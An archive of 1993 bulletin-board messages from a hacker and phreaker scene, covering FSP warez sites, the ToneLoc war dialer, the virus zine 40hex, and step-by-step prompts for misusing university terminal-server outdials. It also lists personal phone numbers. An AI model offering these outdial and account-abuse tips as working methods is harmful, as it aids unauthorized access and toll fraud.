all@yabbs Subject: cthief Date: Wed Apr 21 14:15:50 1993 Could someone send it uuencoded to me here or as thanks. . From swerve@yabbs Wed Apr 21 17:03:28 1993 From: swerve@yabbs To: greywolf@yabbs Subject: re: fsp Date: Wed Apr 21 17:03:28 1993 the latest version of fsp is sitting at in the /tmp dir swervE � From greywolf@yabbs Thu Apr 22 02:26:53 1993 From: greywolf@yabbs To: swerve@yabbs Subject: re: fsp Date: Thu Apr 22 02:26:53 1993 thanks! Now, any body got a list of fsp sites? From dork@yabbs Thu Apr 22 13:30:28 1993 From: dork@yabbs To: all@yabbs Subject: Vox Date: Thu Apr 22 13:30:28 1993 What in the blue blazes has happened to mindvox...cannnot telnet there to save my life and have no local outdials to New York so the last time i waas on I had to call direct and was down to 7200 in seconds... Anybody have any information cause no one on the old of slow chat is answering me either...I do not have time for a major project at the moment...canna sew one cuttt me some slack ear???? CritiC - if anyone cares.... From liqjesus@yabbs Thu Apr 22 13:42:13 1993 From: liqjesus@yabbs To: dork@yabbs Subject: re: Vox Date: Thu Apr 22 13:42:13 1993 That's a relief. I thought I was the only one who couldn't log on thru telenet. You figure you pay $$ to get on the place, at least you should be able to CONNECT to the damn board! Mindvox seems to be plagued with problems lately. From swerve@yabbs Thu Apr 22 15:32:31 1993 From: swerve@yabbs To: greywolf@yabbs Subject: re: fsp Date: Thu Apr 22 15:32:31 1993 In message re: fsp, greywolf said: > thanks! > Now, any body got a list of fsp sites? Well, i got some . if you mail me i can forward some out to ya'. swerve � From edster@yabbs Thu Apr 22 22:46:43 1993 From: edster@yabbs To: all@yabbs Subject: 703/804 Outdials... Date: Thu Apr 22 22:46:43 1993 Hey.. I know it's an old thread, but it's been a while since I've logged on... That outdial at UVa ( or, I've forgotten) is in area code 804... It's in Charlottesville, and does accept local calls... (ATDT9,,xxxxxxx) The Va Tech CBX ( will let you connect to on-campus and select off campus machines... It's area code 703, in Blacksburg... The #s that are valid on-campus machines start with 231 and 232.. You may still be able to access local off-campus boards by doing the following at the CBX prompt: call datakit vtcbx c 9,xxxxxxx This used to fake the CBX out into thinking you weren't calling from outside VA Tech... I haven't tried it in a while, though, and I'd heard that it didn't work.. But hack away. - Edster� From pyro@yabbs Fri Apr 23 06:56:47 1993 From: pyro@yabbs To: all@yabbs Subject: 'Vox... Date: Fri Apr 23 06:56:47 1993 MindVox has moced from its NeXT workstation to a Sun LAN system, and because of this, and their change to T1 bandwidth, they now have a new net address. NetServ has not gotten the paperwork trhough for '' to work right now, so you have to use the IP Number for the new system: This will connect to it just fine. Few problemsm: because they do not have a IP Name mail is lost in the shuffle (as in, no mail), and a few things like IRC and such are currently messed up. Hopefully they get it all figured out soon. Moving can be such a pain, even if it is sometimes only electronically. -Pyro From tau@yabbs Fri Apr 23 07:06:32 1993 From: tau@yabbs To: greywolf@yabbs Subject: Re: fsp Date: Fri Apr 23 07:06:32 1993 I have the fsp - site list - UpDated: 93 04 19 If you are interested, just leave me a note.. \tau� From artimage@yabbs Fri Apr 23 12:48:23 1993 From: artimage@yabbs To: tau@yabbs Subject: re: Re: fsp Date: Fri Apr 23 12:48:23 1993 I would love a copy. Send it to Thanks, Artimage.- From htoaster@yabbs Fri Apr 23 21:54:41 1993 From: htoaster@yabbs To: wincroft@yabbs Subject: re: fsp Date: Fri Apr 23 21:54:41 1993 In message re: fsp, wincroft said: > no list, but i have a site that is not on the list. I offer > xxxxxxxxxxxxxx port xxxx. If you have any unlisted sites, pleas meail > them to me at or post. DO NOT POST! This is a warez site...i tried it out...I don't want to have to have yabbs go down because of careless users who think that the greatest idea in the world is to post warez sites...if yabbs continutes to be used like this I will have to take it down (which I really don't want to do). Anyway, keep this stuff off of the board. I'm not going to delete users, since anyone can make a new account anyway. I really don't want to have to start validating people, I like the anonyminity given here...just keep it off... htoaster � From deprogra@yabbs Sat Apr 24 00:35:23 1993 From: deprogra@yabbs To: htoaster@yabbs Subject: re: fsp Date: Sat Apr 24 00:35:23 1993 Okay, I'll bite: what's fsp? From greywolf@yabbs Sat Apr 24 00:55:03 1993 From: greywolf@yabbs To: tau@yabbs Subject: re: Re: fsp Date: Sat Apr 24 00:55:03 1993 I'm the fsp site..and whare I can get fsp..thanks! GREY WOLF From rip torn@yabbs Sat Apr 24 03:20:15 1993 From: rip torn@yabbs To: pez@yabbs Subject: re: scanners Date: Sat Apr 24 03:20:15 1993 If you are still looking for a scanner..try getting ToneLoc's seemingly the best that I've found. It works best if you have a modem that detects voice/data/etc. automatically. From jasonlee@yabbs Sat Apr 24 03:27:51 1993 From: jasonlee@yabbs To: all@yabbs Subject: Info needed! Date: Sat Apr 24 03:27:51 1993 OK, I need info on the ITX OS (commands, bugs, ettc.), and I need to know about the anonymity gained when dialing from a PBX. Thanks a lot. JasonLee From rip torn@yabbs Sat Apr 24 03:34:19 1993 From: rip torn@yabbs To: aleph1@yabbs Subject: re: 2600+ Date: Sat Apr 24 03:34:19 1993 Do you know of any 2600 meetings in Ontario Canada..and if there a "outpost" up here? I'd like to hang at a meeting or two since I heard they get busted quite Phreakwently, and tons of inpho. is passed around. Inquiring minds wanna know. From rip torn@yabbs Sat Apr 24 03:37:25 1993 From: rip torn@yabbs To: ziplock@yabbs Subject: re: Warez junk Date: Sat Apr 24 03:37:25 1993 I'd be interested in grabbing that Elmer Fudd script shit. Where can I go to find it? Sounds like a cool trick to play on an unsuspecting prof.!!! :) From htoaster@yabbs Sat Apr 24 10:53:06 1993 From: htoaster@yabbs To: all@yabbs Subject: magik issue 2 online Date: Sat Apr 24 10:53:06 1993 I just put the second issue of magik online, thanks to cha0s for uploading it. It has some interesting stuff, so make sure to check it out... htoaster � From nmn@yabbs Sat Apr 24 14:22:22 1993 From: nmn@yabbs To: all@yabbs Subject: Well Date: Sat Apr 24 14:22:22 1993 Yeah I found out that it was a nerd test, I read through almost all 512 questions... it was, interesting, but there were alot of bullshit questions on there... NMN From pez@yabbs Sat Apr 24 14:48:23 1993 From: pez@yabbs To: rip torn@yabbs Subject: re: scanners Date: Sat Apr 24 14:48:23 1993 With the help of a few people from this board, I've been able to find plenty of scanners. I have v97 of ToneLoc, but someone informed me that it was a hack. I'd like to try v98 but I haven't found it yet. From odo@yabbs Sat Apr 24 23:30:49 1993 From: odo@yabbs To: all@yabbs Subject: FSP Date: Sat Apr 24 23:30:49 1993 (Wht the heck is FSP) And what is this about scanners? I assume they are to search for ports? Wonder if the site admin would get teed off by the humoungous system time taken up by them... (well if you OWN your own site then it is no prob!) Didn't know internet had all this stuff on here. Amazing what the feds don't know about. A 5 year old could do better investigating! Laterz From wincroft@yabbs Sun Apr 25 01:03:36 1993 From: wincroft@yabbs To: odo@yabbs Subject: re: FSP Date: Sun Apr 25 01:03:36 1993 well, Fsp is a protocol that allows you to get files form other sites. The big diffrence is that you never really log into those sites. you are there, but you ain't. (Alos the >=1kps transfer rates a way slow compared to the 6,7 + kps i get on FTP) as for the feds, well what can i say, the internet is so o large, and is not regulated (mutch) by the gov. (a working anarchy, sorta'). and if the SPA wanted to crack down on pirate fsp sites, well they may have a problem doing such overseas. The legal problems! who would proscesute (sp?) is it breaking US law or Thier Laws? Where was the crim commited. I think something may be said about this in the next issue of CUD dealing with the Spa. Till then, I'll see ya' when i see ya' From darkside@yabbs Sun Apr 25 03:45:39 1993 From: darkside@yabbs To: invalid@yabbs Subject: re: dialout Date: Sun Apr 25 03:45:39 1993 > fuck man it had been a long time. Didn't know you were on here. Of course > my boadr is still up and Phalcon/Skism is still going strong... call the > boadr or mail me at CCDHB@acvax.INRE.ASU.EDU fo ra 602 internet outdial > (in case you have no way of calling out)... > > Invalid Media, Phalcon/Skism > > > heyo......I'm back! My computer died on me....and I got a new one...shit, has been a while eh? Glad to hear your board is up and running and P/S are still around...thought you guys were finished there....anyway, I haven 't been on here that long...I wasn't back when I was calling your board...and yeah, I could use that OD...I'll email ya, thanks! � From darkside@yabbs Sun Apr 25 03:49:04 1993 From: darkside@yabbs To: invalid@yabbs Subject: re: dialout Date: Sun Apr 25 03:49:04 1993 In message re: dialout, invalid said: > ya got it wrong dude.. landfill was the only boadr affected by the bust > DIRECTLY.. GHeap got visited so his board is down.. decimator's boadr went > down and now its back up privately as a ps site.. we are stilll a ps site > (upt) and a new ps site in 914 went up.. dont know the # > > Invalid Media, Phalcon/Skism > > sorry...and glad ya corrected, what happened to USSR? No offense but I hope he burnt in hell...anyway, hope to be back on your board soon! Ciao! P.S. - Greets Kingpin.... � From greywolf@yabbs Sun Apr 25 20:01:15 1993 From: greywolf@yabbs To: all@yabbs Subject: re: dialout Date: Sun Apr 25 20:01:15 1993 Wanted: hack/phreak boards with (if possible) coressponind outdials from internet BTW: does anyone know how I can patch into other networks from internet (such as tymnet/sprintnet?) And anybody got a GOD? I really would like to call overseas ! GREY WOLF From hangman@yabbs Sun Apr 25 21:47:59 1993 From: hangman@yabbs To: all@yabbs Subject: stuff Date: Sun Apr 25 21:47:59 1993 Well, I'm new to these parts. I'd appreciate the names and BBS numbers of some good boards, <14.4K or more naturally> and some help with FSP and such. I cannot seem to get FSP to work for me. Please contact me in E-Mail here if you would be willing to move this discussion to regular Internet mail. Please. Thank you. From jasonlee@yabbs Sun Apr 25 23:38:19 1993 From: jasonlee@yabbs To: pez@yabbs Subject: re: scanners Date: Sun Apr 25 23:38:19 1993 Ah, I have toneloc 98, so I guess I should FTP it here. I'll do that immediately after I'm done here. JasonLee From kamakize@yabbs Mon Apr 26 00:04:24 1993 From: kamakize@yabbs To: edster@yabbs Subject: re: 703/804 Outdials... Date: Mon Apr 26 00:04:24 1993 hey dude the local # from roanoke 985-0071 Vtcbx c datakit c vtcbx c vtelnet gets me here! ill letcha knoq what goes on btw if you can call rke my vmb is 981-3434 box 757 laterz From kamakize@yabbs Mon Apr 26 00:06:33 1993 From: kamakize@yabbs To: jasonlee@yabbs Subject: 804/703 Date: Mon Apr 26 00:06:33 1993 im in 703 - South-western Va in ol Roanoke my bbs 703-366-4620 laterz From pez@yabbs Mon Apr 26 02:52:25 1993 From: pez@yabbs To: jasonlee@yabbs Subject: re: scanners Date: Mon Apr 26 02:52:25 1993 >Ah, I have toneloc 98, so I guess I should FTP it here. >I'll do that immediately after I'm done here. Appreciate the offer, but I don't think htoaster allows binary files on the board. An interesting bit I just read in magik2... Codethief5.1 seems to be a hack. It looks like the only thing that was changed was the credits though. -Pez From htoaster@yabbs Mon Apr 26 08:43:58 1993 From: htoaster@yabbs To: pez@yabbs Subject: re: scanners Date: Mon Apr 26 08:43:58 1993 In message re: scanners, pez said: > >Ah, I have toneloc 98, so I guess I should FTP it here. > >I'll do that immediately after I'm done here. > > Appreciate the offer, but I don't think htoaster allows > binary files on the board. It is can go through or any of the fsp sites or whatever. htoaster � From deprogra@yabbs Mon Apr 26 10:05:45 1993 From: deprogra@yabbs To: all@yabbs Subject: 2600 in Seattle Date: Mon Apr 26 10:05:45 1993 According to the Spring 2600, there will be a meeting in Seattle. It will be on the first floor of the Washington State convention center. The payphone numbers published in the spring issue are wrong!! Here are the correct numbers: (206) 220-9774, 9775, 9776, 9777. From kilroy@yabbs Mon Apr 26 13:42:25 1993 From: kilroy@yabbs To: greywolf@yabbs Subject: re: hack sites Date: Mon Apr 26 13:42:25 1993 I am sorta new to I-net myself, and was wondering if you could explain o-dials a do you find them? I'd like to reach a few people in other states via bbs's, but don't have any outdials with which to do this. Any help would be appreciated...Thanks. From kilroy@yabbs Mon Apr 26 13:44:01 1993 From: kilroy@yabbs To: mintent@yabbs Subject: re: addresses Date: Mon Apr 26 13:44:01 1993 Is the place still available? Whenever i've tried, all i get is 'Unaccepting new logons', or something to that effect...has thatd to anyone else? From kilroy@yabbs Mon Apr 26 13:47:57 1993 From: kilroy@yabbs To: skippy@yabbs Subject: re: hacking? Date: Mon Apr 26 13:47:57 1993 How could you go about scanning IP addresses...would you have to set up a script in your comm program? I'm sure that wouldn't be hard at all.... From kilroy@yabbs Mon Apr 26 13:49:04 1993 From: kilroy@yabbs To: pyro@yabbs Subject: re: HP Network... Date: Mon Apr 26 13:49:04 1993 Yea, that info on an HP net sounds interesting....if you'd like any help, or just wanna talk about it, e-mail me at Thanks... From kilroy@yabbs Mon Apr 26 13:52:10 1993 From: kilroy@yabbs To: all@yabbs Subject: re: hacker test Date: Mon Apr 26 13:52:10 1993 Any chance of someone sending up Code Thief 5.1 here? Or, to another FTP site? From kilroy@yabbs Mon Apr 26 13:53:55 1993 From: kilroy@yabbs To: swerve@yabbs Subject: re: fsp sites Date: Mon Apr 26 13:53:55 1993 I've got a list or two if you'd like to trade sites...e-mail me at From kilroy@yabbs Mon Apr 26 13:57:15 1993 From: kilroy@yabbs To: swerve@yabbs Subject: re: fsp Date: Mon Apr 26 13:57:15 1993 What are FSP sites, anyway? I'm sorta new to the Net, so forgive me... From kilroy@yabbs Mon Apr 26 14:00:25 1993 From: kilroy@yabbs To: rip torn@yabbs Subject: re: scanners Date: Mon Apr 26 14:00:25 1993 I've got Tone Loc, and i can't seem to get it to work with COM4 on my fact, it probably won't work with it in the first place. Then again, i have a Boca, so that probably explains it... From christj@yabbs Mon Apr 26 19:43:40 1993 From: christj@yabbs To: kamakize@yabbs Subject: re: 703/804 Outdials... Date: Mon Apr 26 19:43:40 1993 What? Vtcbx? Is that like comin thru SprintNet or Tymnet or somethin? � From kamakize@yabbs Mon Apr 26 20:41:56 1993 From: kamakize@yabbs To: christj@yabbs Subject: re: 703/804 Outdials... Date: Mon Apr 26 20:41:56 1993 no its a local Govonors School's dec server has access to UVA,VA Tech,Radford and JMU and services like VA pen and Net find and modem outdials (only if i could find the passwords for em! i do however have the PW for logon the dec server From fatdog@yabbs Tue Apr 27 00:21:25 1993 From: fatdog@yabbs To: rip torn@yabbs Subject: re: scanners Date: Tue Apr 27 00:21:25 1993 Where can i get a copy of ToneLoc from?? Fatdog. From jasonlee@yabbs Tue Apr 27 03:03:39 1993 From: jasonlee@yabbs To: kilroy@yabbs Subject: re: scanners Date: Tue Apr 27 03:03:39 1993 Toneloc will not work with COMs abbove 2. Kinda sucks, huh? JasonLee From tom@yabbs Tue Apr 27 15:34:51 1993 From: tom@yabbs To: jasonlee@yabbs Subject: re: scanners Date: Tue Apr 27 15:34:51 1993 something about magik-2...they have that credit card formula - it's bullshit...doesn't work. i checked it against some valid cards (that are legally mine by the way) and it's wrong. i don't know the right one, but theirs is wrong... From vapor@yabbs Tue Apr 27 17:49:43 1993 From: vapor@yabbs To: all@yabbs Subject: 40hex Date: Tue Apr 27 17:49:43 1993 Anybody know where I could find 40hex (a virus nfo zine)? I'd like some nfo on it as soon as possible. thanx all From tau@yabbs Tue Apr 27 19:48:43 1993 From: tau@yabbs To: greywolf@yabbs Subject: tja Date: Tue Apr 27 19:48:43 1993 yIn message re: Re: fsp, greywolf said: > I'm the fsp site..and whare I can get fsp..thanks! > > > > GREY WOLF I dont have your Email address, surry, but with out that i'll have a serious problem mailing you, since this mail i public and hoster dont like all what is ending up here. \tau� From tau@yabbs Tue Apr 27 20:05:05 1993 From: tau@yabbs To: hangman@yabbs Subject: re: stuff Date: Tue Apr 27 20:05:05 1993 Hello In message stuff, hangman said: > Well, I'm new to these parts. > > I'd appreciate the names and BBS numbers of some good boards, <14.4K or > more naturally> and some help with FSP and such. I cannot seem to get FSP > to work for me. Wath computer are you compiling fsp for (etc. hp, sun), if you tell me that i would give you some hints! > > Please contact me in E-Mail here if you would be willing to move this > discussion to regular Internet mail. Please. > > Thank you. That will be fine... \tau� From greywolf@yabbs Wed Apr 28 00:03:38 1993 From: greywolf@yabbs To: kilroy@yabbs Subject: re: hack sites Date: Wed Apr 28 00:03:38 1993 I'd be glad to answer all your questions...just chat with me when I'm on here..I'mhere practically every day, at about midnite and after EST. tata From hal9000@yabbs Wed Apr 28 03:15:17 1993 From: hal9000@yabbs To: all@yabbs Subject: re: hack sites Date: Wed Apr 28 03:15:17 1993 Hey All, I should inform y'all, I have been active in the telecom world since before the Ma Bell breakup (what a bitter divorce). But, the one thing I find suprising, is that while I am fairly new to Internet, I really don't know any sites which cater to my kind. I am interested in the cutting edge software which is available. If anyone could mail me, please contact me at : I would appreciate it. I am fairly versed in programing et cetera. I look forward to contacts which share similar interests. -chris From pureluck@yabbs Wed Apr 28 16:27:27 1993 From: pureluck@yabbs To: pyro@yabbs Subject: re: HP Network... Date: Wed Apr 28 16:27:27 1993 I know is starting something called Rewt! And Rewt! Magazine which will discuss mainly INternet related Topics. He went to his student honor court and faced serious expulsion for distributing underground software, a la IRC. tsk tsk. Mail him for more info. pure luck Club IP From cse@yabbs Wed Apr 28 17:35:20 1993 From: cse@yabbs To: tau@yabbs Subject: re: tja Date: Wed Apr 28 17:35:20 1993 tau: my email addres is Pleas email me the info too. thanks ChaisnawEnema From maxan@yabbs Wed Apr 28 19:37:25 1993 From: maxan@yabbs To: christj@yabbs Subject: re: 703/804 Outdials... Date: Wed Apr 28 19:37:25 1993 vtcbx... it's sorta like this board except it's down at virgania polytech. Maxan From wincroft@yabbs Wed Apr 28 19:40:25 1993 From: wincroft@yabbs To: kilroy@yabbs Subject: re: hacker test Date: Wed Apr 28 19:40:25 1993 If you can't find it mail me at I'll upload it, uuencode it and mail it to ya' (send your address in the body, i can't see some addresses in elm). From binkley@yabbs Thu Apr 29 19:14:54 1993 From: binkley@yabbs To: mohawk@yabbs Subject: re: where can you get pgp 2.2? Date: Thu Apr 29 19:14:54 1993 FTP to Soda.Berkeley.EDU and in /tmp/pgp22 Source code Program l8r Binkley From binkley@yabbs Thu Apr 29 19:16:18 1993 From: binkley@yabbs To: invalid@yabbs Subject: re: dialout Date: Thu Apr 29 19:16:18 1993 Where could I get 40Hex?? I tried to get into UnPhammiliar but I couldn't get past the new user voting... Binkley From binkley@yabbs Thu Apr 29 19:28:52 1993 From: binkley@yabbs To: snoblind@yabbs Subject: re: MS-DOS BBS Date: Thu Apr 29 19:28:52 1993 Celerity can be configured to look like UNIX in the logon shell. 1.42 is the newest release so far as I know. From binkley@yabbs Thu Apr 29 19:29:34 1993 From: binkley@yabbs To: all@yabbs Subject: Celerity Date: Thu Apr 29 19:29:34 1993 Does anybody know where I could FTP various BBS programs like LSAD, Vision-X and celerity?? If so, please let me know, l8r Binkley From binkley@yabbs Thu Apr 29 19:39:18 1993 From: binkley@yabbs To: fatdog@yabbs Subject: re: scanners Date: Thu Apr 29 19:39:18 1993 Well, I have no idea how to send a binary file through the internet, but you can call my BBS any time. !@#$!!!!kjtzy|~}{xwv 207-562-9226 I've got it there. l8r Binkley From binkley@yabbs Thu Apr 29 19:40:31 1993 From: binkley@yabbs To: liqjesus@yabbs Subject: re: scanners Date: Thu Apr 29 19:40:31 1993 how about in New England? The Center of the Universe. 207-562-9226 l8r Binkley From greywolf@yabbs Thu Apr 29 20:23:17 1993 From: greywolf@yabbs To: all@yabbs Subject: Outdials Date: Thu Apr 29 20:23:17 1993 Okey, I've found the following if anybody know how to get them to work..please tell me . AC 703: AC 804: AC 412: AC XXX: isn.hcf. I don't know the area code for the last one...if anyone has any more areac codes, please tell me ... I mainly on the look out for Global Outdials..thanks all! Incidently, does anyone know of a gateway from internet to tymnet/sprintnet? Ciao! GREY WOLF From mohawk@yabbs Thu Apr 29 20:50:30 1993 From: mohawk@yabbs To: greywolf@yabbs Subject: re: Outdials Date: Thu Apr 29 20:50:30 1993 The dialout instructions are: LAT, then C dialout, then Ctrl-E ,, d91 (you should be at a * prompt). mohawk From tom@yabbs Thu Apr 29 22:17:04 1993 From: tom@yabbs To: mohawk@yabbs Subject: re: Outdials Date: Thu Apr 29 22:17:04 1993 the first one, is a virginia tech terminal server that doesn't let you do outdials, it comes back with a 'this terminal lacks permission to dial out' message...the last one looks like Johns Hopkins university ( so is in 301 i the, does that have anything to do with compuserve? they both use cis (compuserve info services)...i dunno though. � From jasonlee@yabbs Fri Apr 30 00:30:21 1993 From: jasonlee@yabbs To: all@yabbs Subject: jhu outdial Date: Fri Apr 30 00:30:21 1993 The jhu outdial is in 410, and a local bbs is at 539-2261. AT commands must be given in CAPS, however. Good luck on getting it to work. JasonLee From mohawk@yabbs Fri Apr 30 01:01:07 1993 From: mohawk@yabbs To: tom@yabbs Subject: re: Outdials Date: Fri Apr 30 01:01:07 1993 tom, cis refers to computer information science, the outdials are not related to compuserve. The outdial is run by university of pittsburgh. mohawk From tboe@yabbs Fri Apr 30 02:56:51 1993 From: tboe@yabbs To: jasonlee@yabbs Subject: re: jhu outdial Date: Fri Apr 30 02:56:51 1993 > num: [225] to: [all] from: [jasonlee] time: [Fri Apr 30 00:30:21 1993] > title: [jhu outdial] length: [148 bytes] > ---- > The jhu outdial is in 410, and a local bbs is at 539-2261. > AT commands must be given in CAPS, however. Good luck on getting it to > work. ok, I tried it, and this is the result: > LANTRONIX ETS-16 Terminal Server Version 2.1/25(910802) > > Type HELP at the 'Local>' prompt for assistance. > Username> tmp > > %Info: Connecting to local service DIAL. > > DIAL: ATDT539-2261 > WRONG ADDRESS > DIAL: ATDT 539-2261 > WRONG ADDRESS what did I do wrong ? � From hmaster@yabbs Fri Apr 30 20:08:46 1993 From: hmaster@yabbs To: tom@yabbs Subject: re: Outdials Date: Fri Apr 30 20:08:46 1993 You shouls try to enter a melfunction loop on the terminal you logon to and then it might drop you into the main terminal. Hmaster From hiro@yabbs Sat May 1 01:46:52 1993 From: hiro@yabbs To: all@yabbs Subject: FSP Date: Sat May 1 01:46:52 1993 FSP is currently on, in the /pub directory. Get fsp.client.tar or whatever it is. It compiles no problem on a Sun. The one gripe I have with it is that it is slower than treacle in January, but I suppose that is because it uses less bandwidth so the sites are less likely to get busted. That does no, however, explain why the damn things are down so often. The thing is it's not quite as hand-holding as FTP. You tell it to connect, but you're not sure if it's connected or not, because the connect command simply tells your machine where to send all subsequent instructions. So you apparently connect instantaneously, but to do a simple ls might take until the entropy death of the universe. Kind of uncool until you see what kind of sick shit is out there. From deprogra@yabbs Sat May 1 03:06:01 1993 From: deprogra@yabbs To: tboe@yabbs Subject: re: jhu outdial Date: Sat May 1 03:06:01 1993 Maybe it doesn't want the atdt. From stone@yabbs Sat May 1 17:23:42 1993 From: stone@yabbs To: mohawk@yabbs Subject: Stone Date: Sat May 1 17:23:42 1993 MoHawk, Stone here, I finally got this to work. U ever all the Hell Pit BBS yet? I sent a few files to the Magnetic Page a few days ago. Anyone know a good place to d/l the latest PGP?? Stone L8tr From hawkwind@yabbs Sun May 2 16:14:27 1993 From: hawkwind@yabbs To: all@yabbs Subject: Summer places... Date: Sun May 2 16:14:27 1993 So now that it looks like yabbs is going down, where can everyone be found over the summer?? d-dials aren't always the easiest to reach from Europe.... :-) Cheers, Hawkwind. From mohawk@yabbs Sun May 2 18:47:47 1993 From: mohawk@yabbs To: all@yabbs Subject: pgp Date: Sun May 2 18:47:47 1993 You can ftp it from mohawk From vapor@yabbs Sun May 2 20:19:09 1993 From: vapor@yabbs To: invalid@yabbs Subject: re: dialout Date: Sun May 2 20:19:09 1993 where can I get 40hex?? From stone@yabbs Sun May 2 21:17:12 1993 From: stone@yabbs To: mohawk@yabbs Subject: re: pgp Date: Sun May 2 21:17:12 1993 Mohawk, u know where I can pick up the shell for PGP? Stone From mohawk@yabbs Mon May 3 10:46:04 1993 From: mohawk@yabbs To: vapor@yabbs Subject: 40hex Date: Mon May 3 10:46:04 1993 I think illumina's board has it, he has his board # and NUP in his info file here. If you want to wait before calling l/d, I can check and tell you by tomorrow. mohawk From jasonlee@yabbs Mon May 3 16:01:36 1993 From: jasonlee@yabbs To: all@yabbs Subject: re: jhu outdial Date: Mon May 3 16:01:36 1993 Ah, for the jhu outdial, you must type 'decnet' at the DIAL: prompt. From there, type 'c jhupout' or 'c cemod1' and try really hard to get the thing to work! Try 539-2261 if you succeed. JasonLee From zaphyr@yabbs Mon May 3 20:50:46 1993 From: zaphyr@yabbs To: all@yabbs Subject: re: FSP Date: Mon May 3 20:50:46 1993 Greetings all. I am new user to your bbs. I was referred here to help answer questions about FSP and Outdial. Is FSP like FTP? Please comeone can email a sitelist to below address? What is Outdial? Thank you Zaphyr (the bbs one) From mephisto@yabbs Tue May 4 09:32:26 1993 From: mephisto@yabbs To: all@yabbs Subject: FSP Date: Tue May 4 09:32:26 1993 How do I compile FSP with AIX on a RS/6000?� From tau@yabbs Wed May 5 12:46:42 1993 From: tau@yabbs To: hawkwind@yabbs Subject: re: Summer places... Date: Wed May 5 12:46:42 1993 Hi. im on daimi all the summer but you might find me anywhere on the internet. So if you want to talk, please mail. or finger me, if you want an online talk conecton. (finger, or mail se you later! \tau� From vapor@yabbs Thu May 6 00:35:58 1993 From: vapor@yabbs To: mohawk@yabbs Subject: re: 40hex Date: Thu May 6 00:35:58 1993 ok, but my email is down right now.. (may not work, try it) (nother hack account, same story) From vapor@yabbs Thu May 6 17:17:50 1993 From: vapor@yabbs To: all@yabbs Subject: mail Date: Thu May 6 17:17:50 1993 Alright, anyone trying to send me mail, ajohnson doesnt work, and gmorehou is down but you can send mail, I will just get it a few days late From kamakize@yabbs Thu May 6 19:06:06 1993 From: kamakize@yabbs To: greywolf@yabbs Subject: the Date: Thu May 6 19:06:06 1993 the 703 vtcbx is only to on cmapus systems which go down May 8th (grad ect..) but cbx is still up it USED to only call Blacksburg,Va (703-951 253,952(?)) and the bbses were 25XXX or 22XXX or 23XXX or 24XXX From kamakize@yabbs Thu May 6 19:07:57 1993 From: kamakize@yabbs To: tboe@yabbs Subject: try Date: Thu May 6 19:07:57 1993 as on a umontreeal od which i use i have to do this for the number 99484802 that is all.. no ATDT for Dial: its like a simpe term has atdt ready to go. first try it without the nine then withg the 9 have a nice day From kamakize@yabbs Thu May 6 19:10:25 1993 From: kamakize@yabbs To: kamakize@yabbs Subject: re: try Date: Thu May 6 19:10:25 1993 ok.. for those to e-mail me this is a legal address i can send you info on internet if you e-mail me there! From wonko@yabbs Thu May 6 19:25:40 1993 From: wonko@yabbs To: mohawk@yabbs Subject: re: 40hex Date: Thu May 6 19:25:40 1993 In message 40hex, mohawk said: > I think illumina's board has it, he has his board # and NUP in his info > file here. If you want to wait before calling l/d, I can check and tell > you by tomorrow. > mohawk > his HD crashed recently, so if you look for the file and it says it's there but it really isn't send me mail and i will have it put online. Wonko the Sane � From pat@yabbs Fri May 7 14:07:01 1993 From: pat@yabbs To: all@yabbs Subject: re: 703 dialout Date: Fri May 7 14:07:01 1993 You might also be interested in 386BSD or Linux... both of which are full implementations of UNIX. And absolutely free! BTW, yabbs will compile with no errors on 386BSD. From htoaster@yabbs Fri May 7 21:32:39 1993 From: htoaster@yabbs To: pat@yabbs Subject: re: 703 dialout Date: Fri May 7 21:32:39 1993 In message re: 703 dialout, pat said: > You might also be interested in 386BSD or Linux... both of which are > full implementations of UNIX. And absolutely free! > > BTW, yabbs will compile with no errors on 386BSD. > > or linux or a whole lot of other systems... htoaster � From stone@yabbs Sat May 8 19:24:58 1993 From: stone@yabbs To: all@yabbs Subject: Hackers helper Date: Sat May 8 19:24:58 1993 Today I was on my way to Pittsburg, and I saw a store that was called "Hackers Helper" !! :) Anyone heard of it ??? I wonder what kind of store it is.............. Stone From greywolf@yabbs Sun May 9 03:20:22 1993 From: greywolf@yabbs To: all@yabbs Subject: OUTDIALS, FSP Date: Sun May 9 03:20:22 1993 Anybody have some outdials for europe, or GODs? And anybody else got some fsp sites? good ones that is. GREY WOLF From greywolf@yabbs Sun May 9 03:21:36 1993 From: greywolf@yabbs To: all@yabbs Subject: santafe bbs Date: Sun May 9 03:21:36 1993 Anybody been able to get an account there? I call it up, enter bbs, then apply for an account.. it logs me off says to call back.. I call back, and instead of entering bbs, I enter my new login id (that it tells me to use) and my password, but it doesnt let me in. I've tried it at least 3 times.. anybody know what's up? GREY WOLF From holden@yabbs Sun May 9 14:58:33 1993 From: holden@yabbs To: all@yabbs Subject: scene in pitt Date: Sun May 9 14:58:33 1993 I'm going to Pittsburg (cmu) in the fall as a freshman and have been hacking here in Calif. all my life. How is the scene? Here in Calif., there are many pacbell yards who are unsuspecting, no cller ID, possibilities of wardialing for days, etc. etc. Also, could someone reply to this msg as to where I could get an e-mail acct? From htoaster@yabbs Sun May 9 22:17:17 1993 From: htoaster@yabbs To: holden@yabbs Subject: re: scene in pitt Date: Sun May 9 22:17:17 1993 In message scene in pitt, holden said: > I'm going to Pittsburg (cmu) in the fall as a freshman and have been > hacking here in Calif. all my life. How is the scene? Here in Calif., > there are many pacbell yards who are unsuspecting, no cller ID, > possibilities of wardialing for days, etc. etc. > > Also, could someone reply to this msg as to where I could get an e-mail > acct? No caller id in pittsburgh either. As for the scene, it isn't that great...pretty small 2600 meetings, and not that much going on...As for an account, you get one from cmu a few days before you arrive. No idea before then... htoaster � From proteus@yabbs Sun May 9 23:41:32 1993 From: proteus@yabbs To: htoaster@yabbs Subject: re: scene in pitt Date: Sun May 9 23:41:32 1993 you could always go and buy an account from some cheap place... i think telerama is offering accounts in pittsburgh for 30 bucks a month...and that includes infinite usage. i could look around for the number if you're really interested in an account.. oh well.... ---proteus From zyklon-b@yabbs Sun May 9 23:55:41 1993 From: zyklon-b@yabbs To: binkley@yabbs Subject: 40hex Date: Sun May 9 23:55:41 1993 Try Ripco ][ or RuneStone... From zyklon-b@yabbs Sun May 9 23:57:41 1993 From: zyklon-b@yabbs To: binkley@yabbs Subject: Forum-BBS Date: Sun May 9 23:57:41 1993 I haven't seen any of the Forum-clone BBS software at any sites... However, do call [BoSS] at 1.304.697.6131 and mention ZyKLoN-b (and that I mailed you on YABBS) and you'll get access -- there's a really good selection of BBS softwares available... From holden@yabbs Mon May 10 00:00:06 1993 From: holden@yabbs To: proteus@yabbs Subject: re: scene in pitt Date: Mon May 10 00:00:06 1993 don't worry 'bout it.. I need an anonymous acct. From proteus@yabbs Mon 